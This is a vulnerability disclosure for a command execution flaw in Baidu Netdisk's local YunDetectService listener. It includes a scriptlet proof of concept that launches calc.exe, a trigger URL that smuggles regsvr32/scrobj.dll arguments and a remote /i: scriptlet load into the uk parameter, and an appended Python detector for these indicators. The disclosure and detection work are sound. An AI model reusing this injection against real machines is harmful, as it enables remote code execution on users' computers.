Baidu Netdisk (百度网盘) versions below 7.59.5.104 have a command execution vulnerability

Download address: https://136892-1793258927.antpcdn.com:19001/b/pkg-ant.baidu.com/issue/netdisk/yunguanjia/BaiduNetdisk_7.59.5.104.exe

YunDetectService.exe starts automatically at boot by default, requires no login, and listens on port 10000; if that port is already taken it falls back to the next one (port + 1).

C:\Users\admin>netstat -ano|findstr 10000
  TCP    127.0.0.1:10000        0.0.0.0:0              LISTENING       11892

C:\Users\admin>tasklist|findstr 11892
YunDetectService.exe         11892 Console                    1     17,740 K

poc.xml is meant to be loaded remotely; for convenience it is served locally here with python -m http.server.

<?xml version="1.0"?>
<scriptlet>
  <registration
    progid="poc"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
      <![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c calc.exe");
      ]]>
    </script>
  </registration>
</scriptlet>

Trigger

https://127.0.0.1:10000/?method=OpenSafeBox&uk=n0o0b -install regdll "C:\Windows\System32\scrobj.dll\" /u /i:http://127.0.0.1:8000/poc.xml "..\..\..\..\..\..\..\..\Users\admin\AppData\Roaming\baidu\BaiduNetdisk"


Command actually executed

"C:\Users\admin\AppData\Roaming\baidu\BaiduNetdisk\BaiduNetdisk.exe" -opensafebox -userkey n0o0b -install regdll "C:\Windows\System32\scrobj.dll\" /u /i:http://127.0.0.1:8000/poc.xml "..\..\..\..\..\..\..\..\Users\admin\AppData\Roaming\baidu\BaiduNetdisk"


This triggers Defender alerts:

  • Command execution behaviour


  • File download, malicious content loaded

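As an added detection-side example (not part of the original writeup), the following Python flags the two artefacts described above: a BaiduNetdisk.exe process command line carrying -install regdll with scrobj.dll, a remote /i: scriptlet URL and a path-traversal argument, and a request to the local YunDetectService listener whose uk= value smuggles extra switches. The sample command lines and request are constructed to mirror the page's example, not captured from a real host.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed samples mirroring the writeup (first is the injected form, second is benign).
SAMPLE_CMDLINES = [
    r'"C:\Users\admin\AppData\Roaming\baidu\BaiduNetdisk\BaiduNetdisk.exe" -opensafebox -userkey n0o0b'
    r' -install regdll "C:\Windows\System32\scrobj.dll\" /u /i:http://127.0.0.1:8000/poc.xml'
    r' "..\..\..\..\..\..\..\..\Users\admin\AppData\Roaming\baidu\BaiduNetdisk"',
    r'"C:\Users\admin\AppData\Roaming\baidu\BaiduNetdisk\BaiduNetdisk.exe" -opensafebox -userkey n0o0b',
]
SAMPLE_REQUEST = (
    r'https://127.0.0.1:10000/?method=OpenSafeBox&uk=n0o0b -install regdll'
    r' "C:\Windows\System32\scrobj.dll\" /u /i:http://127.0.0.1:8000/poc.xml'
    r' "..\..\..\..\..\..\..\..\Users\admin\AppData\Roaming\baidu\BaiduNetdisk"'
)


def assess_cmdline(cmdline: str) -> list[str]:
    """Return indicator names found in a BaiduNetdisk.exe process command line."""
    hits = []
    low = cmdline.lower()
    if "baidunetdisk.exe" not in low:
        return hits  # only the client binary is of interest here
    if re.search(r"-install\s+regdll", low):
        hits.append("install_regdll")          # switch that passes arguments to regsvr32
    if "scrobj.dll" in low:
        hits.append("scrobj_dll")              # scriptlet COM handler used for remote .sct/.xml loads
    if re.search(r"/i:https?://", low):
        hits.append("remote_scriptlet_url")    # /i: pointing at an HTTP(S) resource
    if re.search(r"(\.\.[\\/]){2,}", cmdline):
        hits.append("path_traversal")          # repeated ..\ escaping the install directory
    return hits


def assess_request(url: str) -> list[str]:
    """Return indicators for a request to the local YunDetectService listener."""
    hits = []
    query = parse_qs(urlsplit(url).query)
    if query.get("method", [""])[0].lower() == "opensafebox":
        uk = query.get("uk", [""])[0]
        if re.search(r"\s-\w", uk):          # a user key should be a bare token, not carry switches
            hits.append("uk_argument_injection")
        if "scrobj.dll" in uk.lower():
            hits.append("scrobj_dll")
    return hits


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(assess_cmdline(line) or "clean", "<-", line[:60])
    print(assess_request(SAMPLE_REQUEST))
```

The same checks map directly onto Sysmon Event ID 1 (process creation) command lines and onto a local proxy or EDR log of requests to 127.0.0.1:10000.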